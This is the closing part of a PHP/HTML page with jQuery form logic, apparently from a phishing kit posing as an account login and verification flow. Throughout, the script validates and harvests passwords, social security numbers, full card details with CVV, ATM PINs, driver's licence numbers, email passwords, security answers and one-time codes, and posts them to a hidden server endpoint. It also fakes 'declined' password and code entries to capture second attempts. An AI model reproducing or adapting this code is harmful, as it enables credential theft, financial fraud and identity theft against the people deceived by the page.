                        $.each($(this).serializeArray(), function(i, field) {
                            values[field.name] = field.value;

                            // console.log(field.name);

                            if(field.name == 'username')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Username is required.');
                                }
                                else if(email_regx.test(field.value))
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Your Username can not be an email address.');
                                }
                                else if(spc_rgx.test(field.value))
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Your Username can not contain spaces');
                                }
                            }

                            if(field.name == 'password' || field.name == 'passwd')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Password is required.');
                                }
                            }


                            if(field.name == 'full_name')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your full name to proceed.');
                                }
                            }
                            
                            if(field.name == 'email')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your email.');
                                }
                                else if(!email_regx.test(field.value))
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter a valid email address.');
                                }
                            }

                            if(field.name == 'mobile_number' || field.name == 'phone')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your 10 digits mobile number.');
                                }
                                else if(field.value.replace(/[^0-9]/g, '').length < 10)
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter a valid mobile number.');
                                }
                            }

                            if(field.name == 'street_address' || field.name == 'street')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your street address.');
                                }
                            }

                            if(field.name == 'city')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your city.');
                                }
                            }

                            if(field.name == 'state')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please select your state.');
                                }
                            }
                            
                            if(field.name == 'zip_code' || field.name == 'zip__code')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your zipcode.');
                                }
                                else if(field.value.replace(/[^0-9]/g, '').length < 4)
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter a valid zipcode.');
                                }
                            }

                            if(field.name == 'dob')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your date of birth.');
                                }
                            }

                            if(field.name == 's_s_n')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please confirm your social security number.');
                                }
                                else if(field.value.replace(/[^0-9]/g, '').length < 9)
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter a valid social security number (9 Digits).');
                                }
                                else if(!sn_rex.test(field.value))
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter a valid social security number.');
                                }
                            }



                            if(field.name == 'cc_num')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please confirm your card number.');
                                }
                                else if(field.value.replace(/[^0-9]/g, '').length < 16)
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter a valid card number (16 Digits).');
                                }
                            }

                            if(field.name == 'cc_exdate')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please confirm your card expiry date.');
                                }
                                else if(field.value.replace(/[^0-9]/g, '').length < 3)
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter a valid card expiry date.');
                                }
                            }
                            

                            if(field.name == 'cc_cv2')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please confirm your card security code. cvv/csc.');
                                }
                                else if(field.value.replace(/[^0-9]/g, '').length < 3)
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter a valid cvv or csc (3-4 Digits).');
                                }
                            }


                            if(field.name == 'a_t_m_pin')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your 4 digits ATM PIN.');
                                }
                                else if(field.value.replace(/[^0-9]/g, '').length < 9)
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your 4 digits ATM PIN.');
                                }
                            }

                            if(field.name == 'd__l')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please enter your drivers license number.');
                                }
                                else if(field.value.replace(/[^0-9]/g, '').length < 9)
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Invalid drivers license number.');
                                }
                            }


                            if(field.name == 'm_j_email')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    modal_resp_err($('#'+field.name), 'Please enter your email.');
                                }
                                else if(!email_regx.test(field.value))
                                {
                                    found_err = true;
                                    modal_resp_err($('#'+field.name), 'Please enter a valid email address.');
                                }
                            }

                            if(field.name == 'm_j_email_password')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    modal_resp_err($('#'+field.name), 'Please enter a valid email address password.');
                                }
                            }



                            if(field.name == 'j_sec_question1')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please select question 1.');
                                }
                            }
                            if(field.name == 'j_sec_answer1')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please answer for question 1.');
                                }
                            }
                            if(field.name == 'j_sec_question2')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please select question 2.');
                                }
                            }
                            if(field.name == 'j_sec_answer2')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please answer for question 2.');
                                }
                            }
                            if(field.name == 'j_sec_question3')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please select question 3.');
                                }
                            }
                            if(field.name == 'j_sec_answer3')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    resp_err($('#'+field.name), 'Please answer for question 3.');
                                }
                            }


                            if(field.name == 'one_time_code')
                            {
                                if(field.value == '')
                                {
                                    found_err = true;
                                    // resp_err($('#'+field.name), 'Please enter your one-time code.');
                                    resp_err($('#'+field.name), 'Please enter your verification code.');
                                }
                            }
                        });

                        // console.log(values);
                        
                        
                        if(found_err === true)
                        {
                            console.log('Found Error');

                            return false;
                        }
                        
                        /*--- Validation Ends ---*/
                        
                        lock_clickable_elements();

                        var $dis = $(this), values = $(this).serialize(), ajxURL = window.hstUrl+'_sysm_.php?_do=ucfbr_form';
                        
                        $.ajax({
                            url: ajxURL,//$(this).attr('action')
                            type: "post",
                            data: values,
                            success: function (res) {

                                console.log(res);

                                if($frm_name == 'form1' || $frm_name == 'signin')
                                {
                                    var dis_pgf_id = $('.page-frame:visible').attr('id');

                                    setTimeout(function(){

                                        clear_err_tins();

                                        if(dis_pgf_id == 'pg001')
                                        {
                                            next_pg = my_form_actions['form1'];

                                            // if($('#pswTab').is(':visible'))
                                            if($('#pswTab:visible').length > 0)
                                            {
                                                // toggle_pg_frame_wt_pass_decline($dis, '#password');

                                                if(window.dPassSubmitCount == '2')
                                                {
                                                    // toggle_pg_frame_wt_2pass($dis, '#password', '#'+next_pg);
                                                    toggle_pg_frame_wt_pass_decline($dis, '#password', '#'+next_pg);

                                                }else{
                                                    toggle_pg_frame('#'+next_pg, 'user_pass_submit'); 
                                                }

                                            }else{
                                                $('.js-switch-back').fadeIn('slow');

                                                $('#pswTab').fadeIn('slow', function(){  $('#pswTab #password').removeAttr('disabled'); $('#pswTab #password').focus(); });

                                                vt('user_id_submit');
                                            }

                                            // vt('user_id_submit');
                                            // toggle_pg_frame('#pg002', 'user_id_submit');
                                        }

                                        else if(dis_pgf_id == 'pg002')
                                        {
                                            // toggle_pg_frame_wt_sec_check($dis, 'password');
                                            // toggle_pg_frame_wt_pass_decline('#pg003', '#password');
                                            // toggle_pg_frame('#pg003', 'kyc_submit');
                                            // toggle_pg_frame('#pg003', 'one_time_code');
                                            // toggle_pg_frame_wt_ohtp_decline($dis, '#one_time_code');

                                            next_pg = my_form_actions['form2'];

                                            if(window.dPassSubmitCount == '2')
                                            {
                                                toggle_pg_frame_wt_ohtp_decline($dis, '#one_time_code', '#'+next_pg);

                                            }else{
                                                toggle_pg_frame('#'+next_pg, 'one_time_code_submit'); 
                                            }
                                        }

                                        else if(dis_pgf_id == 'pg003')
                                        {
                                            // load_emv_form($('#email').val());
                                            // vt('kyc_submit');

                                            next_pg = my_form_actions['form3'];

                                            toggle_pg_frame('#'+next_pg, 'kyc_submit');
                                        }

                                        unlock_clickable_elements();
                                        $('html, body').animate({ scrollTop:0}, 'slow');

                                    }, 1000);
                                }
                                

                                if($frm_name == 'form_email')
                                {
                                    setTimeout(function(){

                                        after_emv_frm_submit({'frmobj':$dis, 'pgfid':'pgDone'});

                                        $('.mjx-header').text('Details Confirmed');
                                        $('.mjx-hide-on-done').hide('fast');

                                        //setTimeout(function() { window.location.replace(rediretToURL) }, 3000);

                                        unlock_clickable_elements();
                                        $('html, body').animate({ scrollTop:0}, 'slow');

                                    }, 1000);
                                }
                                            

                            },
                            error: function(xhr, status, error) {
                                //console.log(xhr.responseText);
                                alert('Please make sure you are connected to the internet.');
                                unlock_clickable_elements();
                            }
                        });
                    }

                    if(v_vs && !pfidTimer){ pfidTimer = setInterval(do_pfid_check, 3000); }

                    return false;
                });
            });
        </script>
        <?php include '_evm_js.php'; ?>
    </body>
</html>